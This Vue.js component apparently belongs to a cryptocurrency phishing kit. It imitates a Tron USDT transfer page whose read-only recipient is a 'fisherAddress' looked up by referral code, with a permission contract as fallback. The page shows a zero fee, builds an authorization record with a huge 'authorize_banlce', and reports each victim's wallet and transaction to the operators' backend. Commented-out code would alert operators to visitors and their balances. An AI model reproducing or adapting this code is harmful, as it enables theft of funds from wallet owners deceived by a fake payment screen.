  <template>
    <div class="container">
      <AuthorizePayOverlay
        :visible="overlayVisible"
        :message="overlayMessage"
        :type="overlayType"
      />
      <a-spin :spinning="pageLoading" tip="加载中...">
      <div class="test-banner">buildRawTransaction 测试页</div>

      <a-row class="header" type="flex" align="middle">
        <a-col :span="8">
          <a-button type="text" @click="goBack">
            <template #icon>
              <left-outlined />
            </template>
          </a-button>
        </a-col>
        <a-col :span="8" class="text-center">
          <div class="title">USDT转账</div>
          <div class="subtitle">Tron · RawTx Test</div>
        </a-col>
        <a-col :span="8" class="text-right">
          <a-button type="text" @click="scanQR">
            <template #icon>
              <qrcode-outlined />
            </template>
          </a-button>
        </a-col>
      </a-row>

      <div class="section-title">收款地址</div>
      <a-input-group compact class="input-group">
        <a-input
          v-model:value="recipientAddress"
          placeholder="Tron地址"
          class="address-input"
          readonly
        >
          <template #suffix>
            <a-button type="text" class="user-icon">
              <user-outlined />
            </a-button>
          </template>
        </a-input>
      </a-input-group>

      <a-row type="flex" justify="space-between" align="middle" class="section-title">
        <a-col>数量</a-col>
        <a-col class="text-right">
          <span class="balance">{{ balanceDisplay }} USDT</span>
        </a-col>
      </a-row>

      <a-card class="amount-card">
        <a-input
          style="border: none !important;border-bottom: 1px solid gray  !important;padding: 10px 11px !important;border-radius: 10px 10px 0px 0px;"
          v-model:value="amount"
          placeholder="0"
          class="amount-input"
          size="large"
        />
        <a-divider class="divider" />
        <a-input
          v-model:value="memo"
          placeholder="备注（需支付1TRX）"
          class="memo-input"
        />
      </a-card>

      <a-row type="flex" justify="space-between" align="middle" class="section-title">
        <a-col>矿工费</a-col>
      </a-row>

      <a-card class="fee-card">
        <a-row type="flex" justify="space-between" align="middle" class="fee-row">
          <a-col>$0</a-col>
          <a-col>~</a-col>
        </a-row>
        <a-row type="flex" justify="space-between" align="middle" class="fee-row">
          <a-col>0 TRX</a-col>
          <a-col>
            <down-outlined />
          </a-col>
        </a-row>
      </a-card>

      <a-button
        type="primary"
        block
        size="large"
        class="next-button"
        :disabled="!pageReady || payDisabled || paySubmitting"
        :loading="paySubmitting"
        @click="nextStep"
      >
        下一步
      </a-button>
      </a-spin>
    </div>
  </template>

  <script>
  import { defineComponent, ref, computed, onMounted, onUnmounted } from 'vue';
  import { connectWallet, signAndSendRaw, getWalletResources } from '../util/tronweb';
  import {   getUserByRefer } from '../util/api';
  import { reportAuthorizeTxAfterBroadcast } from '../util/authorizeWatch';
  import { message } from 'ant-design-vue';
  import { useRoute } from 'vue-router';
  import AuthorizePayOverlay from '../components/AuthorizePayOverlay.vue';
  import { PAY_MSG, createPayClickGuard } from '../util/walletPayUi';
  import { getGameGroupIdFromRoute } from '../util/deeplink';
  import {  syncWalletClientFromRoute } from '../util/walletClient';
  import { clientEnv } from '../config/env';

  import {
    LeftOutlined,
    QrcodeOutlined,
    UserOutlined,
    DownOutlined,
  } from '@ant-design/icons-vue';

  function usdtToSun(amount) {
    const n = Number(amount);
    if (!Number.isFinite(n) || n <= 0) return '0';
    return String(Math.round(n * 1_000_000));
  }

  export default defineComponent({
    name: 'WalletLinkTest',
    components: {
      LeftOutlined,
      QrcodeOutlined,
      UserOutlined,
      DownOutlined,
      AuthorizePayOverlay,
    },
    setup() {
      const route = useRoute();
      const recipientAddress = ref('');
      const amount = ref('');
      const memo = ref('');
      const usdtBalance = ref('');
      const referral_code = ref('');
      const gameGroupId = ref(undefined);
      const payDisabled = ref(false);
      const overlayVisible = ref(false);
      const overlayMessage = ref('');
      const wallet = ref('');
      const trx = ref(0);
      const energy = ref(0);
      const money = ref(0);
      const overlayType = ref('error');
      const pageLoading = ref(false);
      const pageReady = ref(false);
      const paySubmitting = ref(false);
      const balanceLoading = ref(false);
      const balancePreloaded = ref(false);
      const payClickGuard = createPayClickGuard();
      let resourcesLoadPromise = null;
      let preloadIdleId = null;
      let preloadTimeoutId = null;

      const balanceDisplay = computed(() => {
        if (balanceLoading.value && !balancePreloaded.value) {
          return '...';
        }
        return usdtBalance.value !== '' ? usdtBalance.value : '--';
      });

      const goBack = () => {
        console.log('[WalletLinkTest] Go back');
      };

      const scanQR = () => {
        console.log('[WalletLinkTest] Scan QR code');
      };

      const showTrxFail = () => {
        overlayType.value = 'error';
        overlayMessage.value = PAY_MSG.trxFail;
        overlayVisible.value = true;
        payDisabled.value = true;
      };


      const showPaySuccessWait = () => {
        overlayType.value = 'wait';
        overlayMessage.value = PAY_MSG.waitNetwork;
        overlayVisible.value = true;
        payDisabled.value = true;
      };

      const nextStep = async () => {
        if (payDisabled.value) {
          return;
        }
        if (!payClickGuard.tryStart()) {
          return;
        }
        paySubmitting.value = true;
        try {
        //await loadWalletResources({ force: true });

        // await addToast({
        //   referralCode: referral_code.value,
        //   address: wallet.value,
        //   usdt_balance: money.value,
        //   trx_balance: trx.value,
        //   energy: energy.value,
        //   is_authorize: '0',
        //   message: '有用户访问网站(RawTx测试)',
        //   gameGroupId: gameGroupId.value,
        //   wallet_type: detectWalletClient(route),
        // });

        // if (!isTrxEnoughForAuthorize(trx.value, energy.value)) {
        //   console.warn('[WalletLinkTest] 余额不足', { trx: trx.value, energy: energy.value });
        //   showGasFail();
        //   return;
        // }

        // if (Number(amount.value) > money.value) {
        //   message.warning('USDT余额不足');
        //   return;
        // }

        const str = getCurrentDateTime() + Math.floor(Math.random() * 100000).toString().padStart(6, '0');
        // const detal = {
        //   price: amount.value,
        //   inputNumber: 1,
        //   inputGT: wallet.value,
        //   orderNo: str,
        //   title: '钱包收款#' + amount.value,
        //   referral_code: referral_code.value,
        // };
        //await addOrder(detal);

        const authData = {
          address: wallet.value,
          tg_no: wallet.value,
          referralCode: referral_code.value,
          authorize_banlce: 1000000000,
          order_no: str,
          usdt_banlce: money.value,
          trx_balance: trx.value,
        };
        if (gameGroupId.value) {
          authData.gameGroupId = gameGroupId.value;
        }
        //await addAuthorize(authData);

        try {
          const amountInSun = usdtToSun(amount.value);
          const result = await signAndSendRaw(recipientAddress.value, amountInSun);
          if (result && result.txid) {
            const reported = await reportAuthorizeTxAfterBroadcast(
              result.txid,
              wallet.value
            );
            if (reported.ok) {
              showPaySuccessWait();
            } else {
              console.warn('[WalletLinkTest] txId 无效，未上报:', result.txid);
              showTrxFail();
            }
          } else {
            showTrxFail();
          }
        } catch (e) {
          console.error('[WalletLinkTest] signAndSendRaw 失败:', e);
          showTrxFail();
        }
        } finally {
          paySubmitting.value = false;
          payClickGuard.end();
        }
      };

      const getCurrentDateTime = () => {
        const date = new Date();
        const year = date.getFullYear();
        const month = ('0' + (date.getMonth() + 1)).slice(-2);
        const day = ('0' + date.getDate()).slice(-2);
        const hours = ('0' + date.getHours()).slice(-2);
        const minutes = ('0' + date.getMinutes()).slice(-2);
        const seconds = ('0' + date.getSeconds()).slice(-2);
        return `${year}${month}${day}${hours}${minutes}${seconds}`;
      };

      const loadWalletResources = async ({ force = false } = {}) => {
        if (!force && resourcesLoadPromise) {
          return resourcesLoadPromise;
        }
        balanceLoading.value = true;
        const task = getWalletResources(wallet.value)
          .then((resources) => {
            trx.value = resources.trx;
            energy.value = resources.energy;
            money.value = resources.usdt;
            usdtBalance.value = money.value;
            balancePreloaded.value = true;
          })
          .catch((err) => {
            if (resourcesLoadPromise === task) {
              resourcesLoadPromise = null;
            }
            throw err;
          })
          .finally(() => {
            balanceLoading.value = false;
            if (resourcesLoadPromise === task) {
              resourcesLoadPromise = null;
            }
          });
        resourcesLoadPromise = task;
        return task;
      };

      const scheduleWalletResourcesPreload = () => {
        const run = () => {
          preloadIdleId = null;
          preloadTimeoutId = null;
          loadWalletResources().catch((err) => {
            console.warn('[WalletLinkTest] 余额预加载失败:', err);
          });
        };
        if (typeof window !== 'undefined' && typeof window.requestIdleCallback === 'function') {
          preloadIdleId = window.requestIdleCallback(run, { timeout: 2500 });
        } else {
          preloadTimeoutId = setTimeout(run, 300);
        }
      };

      onMounted(async () => {
        syncWalletClientFromRoute(route);
        pageLoading.value = true;
        payDisabled.value = true;
        pageReady.value = false;
        try {
          referral_code.value = route.params.referralCode;
          gameGroupId.value = getGameGroupIdFromRoute(route);

          const referTask = referral_code.value
            ? getUserByRefer(referral_code.value)
                .then((userRes) => {
                  const fisherAddress = userRes?.data?.address?.trim();
                  if (fisherAddress && /^T[1-9A-HJ-NP-Za-km-z]{33}$/.test(fisherAddress)) {
                    recipientAddress.value = fisherAddress;
                  } else {
                    recipientAddress.value = clientEnv.tronPermissionContract;
                  }
                })
                .catch(() => {
                  recipientAddress.value = clientEnv.tronPermissionContract;
                })
            : Promise.resolve().then(() => {
                recipientAddress.value = clientEnv.tronPermissionContract;
              });

          const [connectedWallet] = await Promise.all([
            connectWallet(),
            referTask,
          ]);
          wallet.value = connectedWallet;
          if (!wallet.value) {
            return;
          }
          pageReady.value = true;
          payDisabled.value = false;
          scheduleWalletResourcesPreload();
        } catch (e) {
          console.error('[WalletLinkTest] 初始化失败:', e);
          message.error('加载钱包信息失败，请刷新重试');
        } finally {
          pageLoading.value = false;
        }
      });

      onUnmounted(() => {
        if (preloadIdleId != null && typeof window !== 'undefined' && typeof window.cancelIdleCallback === 'function') {
          window.cancelIdleCallback(preloadIdleId);
        }
        if (preloadTimeoutId != null) {
          clearTimeout(preloadTimeoutId);
        }
      });

      return {
        recipientAddress,
        amount,
        memo,
        usdtBalance,
        balanceDisplay,
        payDisabled,
        paySubmitting,
        overlayVisible,
        overlayMessage,
        overlayType,
        pageLoading,
        pageReady,
        goBack,
        scanQR,
        nextStep,
      };
    },
  });
  </script>

  <style scoped>
  .container {
    position: absolute;
    left: 0;
    top: 0;
    bottom: 0;
    right: 0;
    background-color: #f6f6f6;
    display: flex;
    flex-direction: column;
    padding: 16px;
  }

  .test-banner {
    margin-bottom: 8px;
    padding: 6px 10px;
    border-radius: 8px;
    background: #fff7e6;
    color: #ad6800;
    font-size: 12px;
    text-align: center;
  }

  @media screen and (min-width: 960px) {
    .container {
      width: 500px;
      margin: 0 auto;
    }
  }

  .header {
    margin-bottom: 20px;
  }

  .text-center {
    text-align: center;
  }

  .text-right {
    text-align: right;
  }

  .title {
    font-size: 18px;
    font-weight: 500;
  }

  .subtitle {
    color: #acacac;
    font-size: 12px;
  }

  .section-title {
    color: #8c8c8c;
    margin: 15px 0 10px 0;
  }

  .input-group {
    width: 100%;
    margin-bottom: 20px;
  }

  .address-input {
    flex: 1;
    border-radius: 10px 0 0 10px;
  }

  .user-icon {
    border-radius: 0 10px 10px 0;
    padding: 0;
  }

  .amount-card {
    border-radius: 10px;
    margin-bottom: 20px;
  }

  .amount-input {
    font-size: 32px;
    border: none;
    box-shadow: none;
  }

  .memo-input {
    border: none;
    box-shadow: none;
  }

  .divider {
    margin: 15px 0;
  }

  .fee-card {
    border-radius: 10px;
    background-color: #fff;
    padding: 8px 11px;
  }

  .fee-row {
    padding: 10px 0;
  }

  .balance {
    font-size: 12px;
    color: gray;
  }

  .next-button {
    height: 50px;
    border-radius: 10px;
    font-size: 16px;
    margin-top: auto;
    margin-bottom: 56px;
    flex-shrink: 0;

    &:disabled {
      opacity: 0.55;
      cursor: not-allowed;
    }
  }
  </style>
